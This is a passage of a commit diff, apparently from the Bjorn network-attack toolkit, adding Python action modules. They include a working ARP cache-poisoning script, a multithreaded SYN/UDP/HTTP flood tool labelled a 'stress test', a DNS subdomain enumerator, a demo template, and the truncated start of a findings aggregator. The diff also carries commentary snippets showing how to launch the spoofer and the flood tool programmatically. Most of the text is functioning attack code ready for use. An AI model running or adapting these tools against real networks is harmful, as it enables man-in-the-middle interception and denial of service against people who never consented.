BREAKING CHANGE: Complete architecture refactor to prepare the BJORN V2 release: new APIs, assets, UI, webapp, logic, attacks, and many other new features.
New binary files (action icons), all under resources/default_config/actions/actions_icons/:

BIN  ARPSpoof.png        (new file, 40 KiB)
BIN  …                   (new file, 29 KiB)
BIN  DNSPillager.png     (new file, 114 KiB)
BIN  FTPBruteforce.png   (new file, 162 KiB)
BIN  FreyaHarvest.png    (new file, 34 KiB)
BIN  HeimdallGuard.png   (new file, 33 KiB)
BIN  IDLE.png            (new file, 175 KiB)
BIN  LokiDeceiver.png    (new file, 25 KiB)
BIN  …                   (new file, 178 KiB)
BIN  …                   (new file, 185 KiB)
BIN  OdinEye.png         (new file, 138 KiB)
BIN  PresenceJoin.png    (new file, 70 KiB)
BIN  PresenceLeave.png   (new file, 76 KiB)
BIN  RuneCracker.png     (new file, 2.2 MiB)
BIN  SMBBruteforce.png   (new file, 172 KiB)
BIN  SQLBruteforce.png   (new file, 181 KiB)
BIN  SSHBruteforce.png   (new file, 221 KiB)
BIN  StealDataSQL.png    (new file, 181 KiB)
BIN  StealFilesFTP.png   (new file, 154 KiB)
BIN  StealFilesSMB.png   (new file, 172 KiB)
BIN  StealFilesSSH.png   (new file, 159 KiB)
BIN  …                   (new file, 155 KiB)
BIN  …                   (new file, 172 KiB)
BIN  ThorHammer.png      (new file, 137 KiB)
BIN  ValkyrieScout.png   (new file, 30 KiB)
BIN  …                   (new file, 30 KiB)
BIN  …                   (new file, 27 KiB)
BIN  default.png         (new file, 24 KiB)
BIN  thor_hammer.png     (new file, 19 KiB)
resources/default_config/actions/arp_spoofer.py  (new file, 163 lines)
@@ -0,0 +1,163 @@

# ARP Spoofer: poisons the ARP cache of a target and a gateway.
# Saves settings (target, gateway, interface, delay) in `/home/bjorn/.settings_bjorn/arpspoofer_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target     IP address of the target device (overrides saved value).
# -g, --gateway    IP address of the gateway (overrides saved value).
# -i, --interface  Network interface (default: primary or saved).
# -d, --delay      Delay between ARP packets in seconds (default: 2 or saved).
# - First time:  python arp_spoofer.py -t TARGET -g GATEWAY -i INTERFACE -d DELAY
# - Subsequent:  python arp_spoofer.py (uses saved settings).
# - Update:      Provide any argument to override saved values.

import os
import json
import time
import argparse
from scapy.all import ARP, send, sr1, conf


b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_enabled = 0
# Settings directory and file
SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(SETTINGS_DIR, "arpspoofer_settings.json")

class ARPSpoof:
    def __init__(self, target_ip, gateway_ip, interface, delay):
        self.target_ip = target_ip
        self.gateway_ip = gateway_ip
        self.interface = interface
        self.delay = delay
        conf.iface = self.interface  # Set the interface
        print(f"ARPSpoof initialized with target IP: {self.target_ip}, gateway IP: {self.gateway_ip}, interface: {self.interface}, delay: {self.delay}s")

    def get_mac(self, ip):
        """Gets the MAC address of a target IP by sending an ARP request."""
        print(f"Retrieving MAC address for IP: {ip}")
        try:
            arp_request = ARP(pdst=ip)
            response = sr1(arp_request, timeout=2, verbose=False)
            if response:
                print(f"MAC address found for {ip}: {response.hwsrc}")
                return response.hwsrc
            else:
                print(f"No ARP response received for IP {ip}")
                return None
        except Exception as e:
            print(f"Error retrieving MAC address for {ip}: {e}")
            return None

    def spoof(self, target_ip, spoof_ip):
        """Sends an ARP packet to spoof the target into believing the attacker's IP is the spoofed IP."""
        print(f"Preparing ARP spoofing for target {target_ip}, pretending to be {spoof_ip}")
        target_mac = self.get_mac(target_ip)
        spoof_mac = self.get_mac(spoof_ip)
        if not target_mac or not spoof_mac:
            print(f"Cannot find MAC address for target {target_ip} or {spoof_ip}, spoofing aborted")
            return

        try:
            arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
            send(arp_response, verbose=False)
            print(f"Spoofed ARP packet sent to {target_ip} claiming to be {spoof_ip}")
        except Exception as e:
            print(f"Error sending ARP packet to {target_ip}: {e}")

    def restore(self, target_ip, spoof_ip):
        """Sends an ARP packet to restore the legitimate IP/MAC mapping for the target and spoof IP."""
        print(f"Restoring ARP association for {target_ip} using {spoof_ip}")
        target_mac = self.get_mac(target_ip)
        gateway_mac = self.get_mac(spoof_ip)

        if not target_mac or not gateway_mac:
            print(f"Cannot restore ARP, MAC addresses not found for {target_ip} or {spoof_ip}")
            return

        try:
            arp_response = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=gateway_mac)
            send(arp_response, verbose=False, count=5)
            print(f"ARP association restored between {spoof_ip} and {target_mac}")
        except Exception as e:
            print(f"Error restoring ARP association for {target_ip}: {e}")

    def execute(self):
        """Executes the ARP spoofing attack."""
        try:
            print(f"Starting ARP Spoofing attack on target {self.target_ip} via gateway {self.gateway_ip}")

            while True:
                target_mac = self.get_mac(self.target_ip)
                gateway_mac = self.get_mac(self.gateway_ip)

                if not target_mac or not gateway_mac:
                    print("Error retrieving MAC addresses, stopping ARP Spoofing")
                    self.restore(self.target_ip, self.gateway_ip)
                    self.restore(self.gateway_ip, self.target_ip)
                    break

                print(f"Sending ARP packets to poison {self.target_ip} and {self.gateway_ip}")
                self.spoof(self.target_ip, self.gateway_ip)
                self.spoof(self.gateway_ip, self.target_ip)

                time.sleep(self.delay)

        except KeyboardInterrupt:
            print("Attack interrupted. Restoring ARP tables.")
            self.restore(self.target_ip, self.gateway_ip)
            self.restore(self.gateway_ip, self.target_ip)
            print("ARP Spoofing stopped and ARP tables restored.")
        except Exception as e:
            print(f"Unexpected error during ARP Spoofing attack: {e}")

def save_settings(target, gateway, interface, delay):
    """Saves the ARP spoofing settings to a JSON file."""
    try:
        os.makedirs(SETTINGS_DIR, exist_ok=True)
        settings = {
            "target": target,
            "gateway": gateway,
            "interface": interface,
            "delay": delay
        }
        with open(SETTINGS_FILE, 'w') as file:
            json.dump(settings, file)
        print(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        print(f"Failed to save settings: {e}")

def load_settings():
    """Loads the ARP spoofing settings from a JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as file:
                return json.load(file)
        except Exception as e:
            print(f"Failed to load settings: {e}")
    return {}

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="ARP Spoofing Attack Script")
    parser.add_argument("-t", "--target", help="IP address of the target device")
    parser.add_argument("-g", "--gateway", help="IP address of the gateway")
    parser.add_argument("-i", "--interface", default=conf.iface, help="Network interface to use (default: primary interface)")
    parser.add_argument("-d", "--delay", type=float, default=2, help="Delay between ARP packets in seconds (default: 2 seconds)")
    args = parser.parse_args()

    # Load saved settings and override with CLI arguments
    settings = load_settings()
    target_ip = args.target or settings.get("target")
    gateway_ip = args.gateway or settings.get("gateway")
    interface = args.interface or settings.get("interface")
    delay = args.delay or settings.get("delay")

    if not target_ip or not gateway_ip:
        print("Target and Gateway IPs are required. Use -t and -g or save them in the settings file.")
        exit(1)

    # Save the settings for future use
    save_settings(target_ip, gateway_ip, interface, delay)

    # Execute the attack
    spoof = ARPSpoof(target_ip=target_ip, gateway_ip=gateway_ip, interface=interface, delay=delay)
    spoof.execute()
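
A minimal sketch of driving the class above programmatically rather than via the CLI (my illustration, not part of the diff; assumes scapy is installed and the process runs with root privileges, and the IPs/interface are placeholders):

    # Hypothetical standalone usage of arp_spoofer.ARPSpoof (illustration only).
    from arp_spoofer import ARPSpoof

    spoof = ARPSpoof(target_ip="192.168.1.10",
                     gateway_ip="192.168.1.1",
                     interface="eth0",
                     delay=2)
    spoof.execute()  # poisons both directions in a loop; Ctrl+C restores the ARP tables
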
resources/default_config/actions/berserker_force.py  (new file, 315 lines)
@@ -0,0 +1,315 @@

# Resource exhaustion testing tool for network and service stress analysis.
# Saves settings in `/home/bjorn/.settings_bjorn/berserker_force_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -t, --target  Target IP or hostname to test.
# -p, --ports   Ports to test (comma-separated, default: common ports).
# -m, --mode    Test mode (syn, udp, http, mixed, default: mixed).
# -r, --rate    Packets per second (default: 100).
# -o, --output  Output directory (default: /home/bjorn/Bjorn/data/output/stress).

import os
import json
import argparse
from datetime import datetime
import logging
import threading
import time
import queue
import socket
import random
import requests
from scapy.all import *
import psutil
from collections import defaultdict

b_class = "BerserkerForce"
b_module = "berserker_force"
b_enabled = 0

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stress"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "berserker_force_settings.json")
DEFAULT_PORTS = [21, 22, 23, 25, 80, 443, 445, 3306, 3389, 5432]

class BerserkerForce:
    def __init__(self, target, ports=None, mode='mixed', rate=100, output_dir=DEFAULT_OUTPUT_DIR):
        self.target = target
        self.ports = ports or DEFAULT_PORTS
        self.mode = mode
        self.rate = rate
        self.output_dir = output_dir

        self.active = False
        self.lock = threading.Lock()
        self.packet_queue = queue.Queue()

        self.stats = defaultdict(int)
        self.start_time = None
        self.target_resources = {}

    def monitor_target(self):
        """Monitor target's response times and availability."""
        while self.active:
            try:
                for port in self.ports:
                    try:
                        start_time = time.time()
                        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                            s.settimeout(1)
                            result = s.connect_ex((self.target, port))
                            response_time = time.time() - start_time

                        with self.lock:
                            self.target_resources[port] = {
                                'status': 'open' if result == 0 else 'closed',
                                'response_time': response_time
                            }
                    except:
                        with self.lock:
                            self.target_resources[port] = {
                                'status': 'error',
                                'response_time': None
                            }

                time.sleep(1)
            except Exception as e:
                logging.error(f"Error monitoring target: {e}")

    def syn_flood(self):
        """Generate SYN flood packets."""
        while self.active:
            try:
                for port in self.ports:
                    packet = IP(dst=self.target)/TCP(dport=port, flags="S",
                                                     seq=random.randint(0, 65535))
                    self.packet_queue.put(('syn', packet))
                    with self.lock:
                        self.stats['syn_packets'] += 1

                time.sleep(1/self.rate)
            except Exception as e:
                logging.error(f"Error in SYN flood: {e}")

    def udp_flood(self):
        """Generate UDP flood packets."""
        while self.active:
            try:
                for port in self.ports:
                    data = os.urandom(1024)  # Random payload
                    packet = IP(dst=self.target)/UDP(dport=port)/Raw(load=data)
                    self.packet_queue.put(('udp', packet))
                    with self.lock:
                        self.stats['udp_packets'] += 1

                time.sleep(1/self.rate)
            except Exception as e:
                logging.error(f"Error in UDP flood: {e}")

    def http_flood(self):
        """Generate HTTP flood requests."""
        while self.active:
            try:
                for port in [80, 443]:
                    if port in self.ports:
                        protocol = 'https' if port == 443 else 'http'
                        url = f"{protocol}://{self.target}"

                        # Randomize request type
                        request_type = random.choice(['get', 'post', 'head'])

                        try:
                            if request_type == 'get':
                                requests.get(url, timeout=1)
                            elif request_type == 'post':
                                requests.post(url, data=os.urandom(1024), timeout=1)
                            else:
                                requests.head(url, timeout=1)

                            with self.lock:
                                self.stats['http_requests'] += 1

                        except:
                            with self.lock:
                                self.stats['http_errors'] += 1

                time.sleep(1/self.rate)
            except Exception as e:
                logging.error(f"Error in HTTP flood: {e}")

    def packet_sender(self):
        """Send packets from the queue."""
        while self.active:
            try:
                if not self.packet_queue.empty():
                    packet_type, packet = self.packet_queue.get()
                    send(packet, verbose=False)

                    with self.lock:
                        self.stats['packets_sent'] += 1

                else:
                    time.sleep(0.1)

            except Exception as e:
                logging.error(f"Error sending packet: {e}")

    def calculate_statistics(self):
        """Calculate and update testing statistics."""
        duration = time.time() - self.start_time

        stats = {
            'duration': duration,
            'packets_per_second': self.stats['packets_sent'] / duration,
            'total_packets': self.stats['packets_sent'],
            'syn_packets': self.stats['syn_packets'],
            'udp_packets': self.stats['udp_packets'],
            'http_requests': self.stats['http_requests'],
            'http_errors': self.stats['http_errors'],
            'target_resources': self.target_resources
        }

        return stats

    def save_results(self):
        """Save test results and statistics."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

            results = {
                'timestamp': datetime.now().isoformat(),
                'configuration': {
                    'target': self.target,
                    'ports': self.ports,
                    'mode': self.mode,
                    'rate': self.rate
                },
                'statistics': self.calculate_statistics()
            }

            output_file = os.path.join(self.output_dir, f"stress_test_{timestamp}.json")
            with open(output_file, 'w') as f:
                json.dump(results, f, indent=4)

            logging.info(f"Results saved to {output_file}")

        except Exception as e:
            logging.error(f"Failed to save results: {e}")

    def start(self):
        """Start stress testing."""
        self.active = True
        self.start_time = time.time()

        threads = []

        # Start monitoring thread
        monitor_thread = threading.Thread(target=self.monitor_target)
        monitor_thread.start()
        threads.append(monitor_thread)

        # Start sender thread
        sender_thread = threading.Thread(target=self.packet_sender)
        sender_thread.start()
        threads.append(sender_thread)

        # Start attack threads based on mode
        if self.mode in ['syn', 'mixed']:
            syn_thread = threading.Thread(target=self.syn_flood)
            syn_thread.start()
            threads.append(syn_thread)

        if self.mode in ['udp', 'mixed']:
            udp_thread = threading.Thread(target=self.udp_flood)
            udp_thread.start()
            threads.append(udp_thread)

        if self.mode in ['http', 'mixed']:
            http_thread = threading.Thread(target=self.http_flood)
            http_thread.start()
            threads.append(http_thread)

        return threads

    def stop(self):
        """Stop stress testing."""
        self.active = False
        self.save_results()

def save_settings(target, ports, mode, rate, output_dir):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "target": target,
            "ports": ports,
            "mode": mode,
            "rate": rate,
            "output_dir": output_dir
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")

def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

def main():
    parser = argparse.ArgumentParser(description="Resource exhaustion testing tool")
    parser.add_argument("-t", "--target", help="Target IP or hostname")
    parser.add_argument("-p", "--ports", help="Ports to test (comma-separated)")
    parser.add_argument("-m", "--mode", choices=['syn', 'udp', 'http', 'mixed'],
                        default='mixed', help="Test mode")
    parser.add_argument("-r", "--rate", type=int, default=100, help="Packets per second")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    args = parser.parse_args()

    settings = load_settings()
    target = args.target or settings.get("target")
    ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
    mode = args.mode or settings.get("mode")
    rate = args.rate or settings.get("rate")
    output_dir = args.output or settings.get("output_dir")

    if not target:
        logging.error("Target is required. Use -t or save it in settings")
        return

    save_settings(target, ports, mode, rate, output_dir)

    berserker = BerserkerForce(
        target=target,
        ports=ports,
        mode=mode,
        rate=rate,
        output_dir=output_dir
    )

    try:
        threads = berserker.start()
        logging.info(f"Stress testing started against {target}")

        while True:
            time.sleep(1)

    except KeyboardInterrupt:
        logging.info("Stopping stress test...")
        berserker.stop()
        for thread in threads:
            thread.join()

if __name__ == "__main__":
    main()
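
A minimal sketch of a bounded, programmatic run of the class above (my illustration, not part of the diff; assumes scapy/requests are installed, root privileges for raw packets, and a target you are authorized to test):

    # Hypothetical time-limited driver for BerserkerForce (illustration only).
    import time
    from berserker_force import BerserkerForce

    bf = BerserkerForce(target="192.0.2.10", ports=[80, 443], mode="syn", rate=50)
    threads = bf.start()       # spawns monitor, sender, and flood threads
    time.sleep(10)             # let the test run for 10 seconds
    bf.stop()                  # clears the active flag and writes stress_test_*.json
    for t in threads:
        t.join()               # flood loops exit once active is False
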
resources/default_config/actions/demo_action.py  (new file, 234 lines)
@@ -0,0 +1,234 @@

# demo_action.py
# Demonstration Action: wrapped in a DemoAction class

# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal"  # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"

b_examples = [
    {
        "profile": "quick",
        "interface": "auto",
        "target": "192.168.1.10",
        "port": 80,
        "protocol": "tcp",
        "verbose": True,
        "timeout": 30,
        "concurrency": 2,
        "notes": "Quick HTTP scan"
    },
    {
        "profile": "deep",
        "interface": "eth0",
        "target": "example.org",
        "port": 443,
        "protocol": "tcp",
        "verbose": False,
        "timeout": 120,
        "concurrency": 8,
        "notes": "Deep TLS profile"
    }
]

b_docs_url = "docs/actions/DemoAction.md"

# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
    "profile": {
        "type": "select",
        "label": "Profile",
        "choices": ["quick", "balanced", "deep"],
        "default": "balanced",
        "help": "Choose a profile: speed vs depth."
    },
    "interface": {
        "type": "select",
        "label": "Network Interface",
        "choices": [],
        "default": "auto",
        "help": "'auto' tries to detect the default network interface."
    },
    "target": {
        "type": "text",
        "label": "Target (IP/Host)",
        "default": "192.168.1.1",
        "placeholder": "e.g. 192.168.1.10 or example.org",
        "help": "Main target."
    },
    "port": {
        "type": "number",
        "label": "Port",
        "min": 1,
        "max": 65535,
        "step": 1,
        "default": 80
    },
    "protocol": {
        "type": "select",
        "label": "Protocol",
        "choices": ["tcp", "udp"],
        "default": "tcp"
    },
    "verbose": {
        "type": "checkbox",
        "label": "Verbose output",
        "default": False
    },
    "timeout": {
        "type": "slider",
        "label": "Timeout (seconds)",
        "min": 5,
        "max": 600,
        "step": 5,
        "default": 60
    },
    "concurrency": {
        "type": "range",
        "label": "Concurrency",
        "min": 1,
        "max": 32,
        "step": 1,
        "default": 4,
        "help": "Number of parallel tasks (demo only)."
    },
    "notes": {
        "type": "text",
        "label": "Notes",
        "default": "",
        "placeholder": "Free-form comments",
        "help": "Free text field to demonstrate a simple string input."
    }
}

# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
    import psutil
except Exception:
    psutil = None


def _list_net_ifaces() -> list[str]:
    names = set()
    if psutil:
        try:
            names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
        except Exception:
            pass
    try:
        for n in os.listdir("/sys/class/net"):
            if n and n != "lo":
                names.add(n)
    except Exception:
        pass
    out = ["auto"] + sorted(names)
    seen, unique = set(), []
    for x in out:
        if x not in seen:
            unique.append(x)
            seen.add(x)
    return unique


def compute_dynamic_b_args(base: dict) -> dict:
    d = dict(base or {})
    if "interface" in d:
        d["interface"]["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
        if d["interface"].get("default") not in d["interface"]["choices"]:
            d["interface"]["default"] = "auto"
    return d


# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse


class DemoAction:
    """Wrapper called by the orchestrator."""

    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.meta = {
            "class": b_class,
            "module": b_module,
            "enabled": b_enabled,
            "action": b_action,
            "category": b_category,
            "name": b_name,
            "description": b_description,
            "author": b_author,
            "version": b_version,
            "icon": b_icon,
            "examples": b_examples,
            "docs_url": b_docs_url,
            "args_schema": b_args,
        }

    def execute(self, ip=None, port=None, row=None, status_key=None):
        """Called by the orchestrator. This demo only prints arguments."""
        self.shared_data.bjorn_orch_status = "DemoAction"
        self.shared_data.comment_params = {"ip": ip, "port": port}

        print("=== DemoAction :: executed ===")
        print(f"  IP/Target: {ip}:{port}")
        print(f"  Row: {row}")
        print(f"  Status key: {status_key}")
        print("No real action performed: demonstration only.")
        return "success"

    def run(self, argv=None):
        """Standalone CLI mode for testing."""
        parser = argparse.ArgumentParser(description=b_description)
        parser.add_argument("--profile", choices=b_args["profile"]["choices"],
                            default=b_args["profile"]["default"])
        parser.add_argument("--interface", default=b_args["interface"]["default"])
        parser.add_argument("--target", default=b_args["target"]["default"])
        parser.add_argument("--port", type=int, default=b_args["port"]["default"])
        parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
                            default=b_args["protocol"]["default"])
        parser.add_argument("--verbose", action="store_true",
                            default=bool(b_args["verbose"]["default"]))
        parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
        parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
        parser.add_argument("--notes", default=b_args["notes"]["default"])

        args = parser.parse_args(argv)

        print("=== DemoAction :: received parameters ===")
        for k, v in vars(args).items():
            print(f"  {k:11}: {v}")

        print("\n=== Demo usage of parameters ===")
        if args.verbose:
            print("[verbose] Verbose mode enabled → simulated detailed logs...")

        if args.profile == "quick":
            print("Profile: quick → would perform fast operations.")
        elif args.profile == "deep":
            print("Profile: deep → would perform longer, more thorough operations.")
        else:
            print("Profile: balanced → compromise between speed and depth.")

        print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
        print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
        print("No real action performed: demonstration only.")


if __name__ == "__main__":
    DemoAction(shared_data=None).run()
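
A minimal sketch of an orchestrator-side call against the template above (my illustration, not part of the diff; the SimpleNamespace stands in for the real shared_data object, which is assumed to expose bjorn_orch_status and comment_params as execute() uses them):

    # Hypothetical orchestrator-side invocation of DemoAction (illustration only).
    from types import SimpleNamespace
    from demo_action import DemoAction

    shared = SimpleNamespace(bjorn_orch_status=None, comment_params=None)
    action = DemoAction(shared)
    result = action.execute(ip="192.168.1.10", port=80, row={"id": 1}, status_key="demo")
    print(result)  # "success"
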
resources/default_config/actions/dns_pillager.py  (new file, 175 lines)
@@ -0,0 +1,175 @@

# DNS Pillager for reconnaissance and enumeration of DNS infrastructure.
# Saves settings in `/home/bjorn/.settings_bjorn/dns_pillager_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -d, --domain     Target domain for enumeration (overrides saved value).
# -w, --wordlist   Path to subdomain wordlist (default: built-in list).
# -o, --output     Output directory (default: /home/bjorn/Bjorn/data/output/dns).
# -t, --threads    Number of threads for scanning (default: 10).
# -r, --recursive  Enable recursive enumeration of discovered subdomains.

import os
import json
import dns.resolver
import threading
import argparse
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import logging


# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')


b_class = "DNSPillager"
b_module = "dns_pillager"
b_enabled = 0

# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']

class DNSPillager:
    def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False):
        self.domain = domain
        self.wordlist = wordlist
        self.output_dir = output_dir
        self.threads = threads
        self.recursive = recursive
        self.discovered_domains = set()
        self.lock = threading.Lock()
        self.resolver = dns.resolver.Resolver()
        self.resolver.timeout = 1
        self.resolver.lifetime = 1

    def save_results(self, results):
        """Save enumeration results to a JSON file."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
            filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")

            with open(filename, 'w') as f:
                json.dump(results, f, indent=4)
            logging.info(f"Results saved to {filename}")
        except Exception as e:
            logging.error(f"Failed to save results: {e}")

    def query_domain(self, domain, record_type):
        """Query a domain for specific DNS record type."""
        try:
            answers = self.resolver.resolve(domain, record_type)
            return [str(answer) for answer in answers]
        except:
            return []

    def enumerate_domain(self, subdomain):
        """Enumerate a single subdomain for all record types."""
        full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain
        results = {'domain': full_domain, 'records': {}}

        for record_type in DEFAULT_RECORD_TYPES:
            records = self.query_domain(full_domain, record_type)
            if records:
                results['records'][record_type] = records
                with self.lock:
                    self.discovered_domains.add(full_domain)
                logging.info(f"Found {record_type} records for {full_domain}")

        return results if results['records'] else None

    def load_wordlist(self):
        """Load subdomain wordlist or use built-in list."""
        if self.wordlist and os.path.exists(self.wordlist):
            with open(self.wordlist, 'r') as f:
                return [line.strip() for line in f if line.strip()]
        return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']

    def execute(self):
        """Execute the DNS enumeration process."""
        results = {'timestamp': datetime.now().isoformat(), 'findings': []}
        subdomains = self.load_wordlist()

        logging.info(f"Starting DNS enumeration for {self.domain}")

        with ThreadPoolExecutor(max_workers=self.threads) as executor:
            enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
            results['findings'].extend(enum_results)

            if self.recursive and self.discovered_domains:
                logging.info("Starting recursive enumeration")
                new_domains = set()
                for domain in self.discovered_domains:
                    if domain != self.domain:
                        new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
                        new_domains.update(new_subdomains)

                if new_domains:
                    enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
                    results['findings'].extend(enum_results)

        self.save_results(results)
        return results

def save_settings(domain, wordlist, output_dir, threads, recursive):
    """Save settings to JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "domain": domain,
            "wordlist": wordlist,
            "output_dir": output_dir,
            "threads": threads,
            "recursive": recursive
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")

def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

def main():
    parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
    parser.add_argument("-d", "--domain", help="Target domain for enumeration")
    parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
    parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
    parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
    args = parser.parse_args()

    settings = load_settings()
    domain = args.domain or settings.get("domain")
    wordlist = args.wordlist or settings.get("wordlist")
    output_dir = args.output or settings.get("output_dir")
    threads = args.threads or settings.get("threads")
    recursive = args.recursive or settings.get("recursive")

    if not domain:
        logging.error("Domain is required. Use -d or save it in settings")
        return

    save_settings(domain, wordlist, output_dir, threads, recursive)

    pillager = DNSPillager(
        domain=domain,
        wordlist=wordlist,
        output_dir=output_dir,
        threads=threads,
        recursive=recursive
    )
    pillager.execute()

if __name__ == "__main__":
    main()
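
A minimal sketch of a standalone run of the class above (my illustration, not part of the diff; requires dnspython, and the domain and output directory are placeholders chosen to avoid the default /home/bjorn path):

    # Hypothetical programmatic usage of DNSPillager (illustration only).
    from dns_pillager import DNSPillager

    pillager = DNSPillager(domain="example.org", output_dir="/tmp/dns", threads=5)
    results = pillager.execute()   # also writes dns_enum_<timestamp>.json to output_dir
    print(len(results["findings"]), "names returned records")
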
resources/default_config/actions/freya_harvest.py  (new file, 457 lines)
@@ -0,0 +1,457 @@

# Data collection and organization tool to aggregate findings from other modules.
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input   Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
# -o, --output  Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
# -f, --format  Output format (json, html, md, default: all).
# -w, --watch   Watch for new findings in real-time.
# -c, --clean   Clean old data before processing.

import os
import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob
import watchdog.observers
import watchdog.events
import markdown
import jinja2
from collections import defaultdict


b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_enabled = 0

# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')

# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")

# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
    <title>Bjorn Reconnaissance Report</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        .section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
        .vuln-high { background-color: #ffebee; }
        .vuln-medium { background-color: #fff3e0; }
        .vuln-low { background-color: #f1f8e9; }
        table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
        th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
        th { background-color: #f5f5f5; }
        h1, h2, h3 { color: #333; }
        .metadata { color: #666; font-style: italic; }
        .timestamp { font-weight: bold; }
    </style>
</head>
<body>
    <h1>Bjorn Reconnaissance Report</h1>
    <div class="metadata">
        <p class="timestamp">Generated: {{ timestamp }}</p>
    </div>
    {% for section in sections %}
    <div class="section">
        <h2>{{ section.title }}</h2>
        {{ section.content }}
    </div>
    {% endfor %}
</body>
</html>
"""

class FreyaHarvest:
    def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
                 formats=None, watch_mode=False, clean=False):
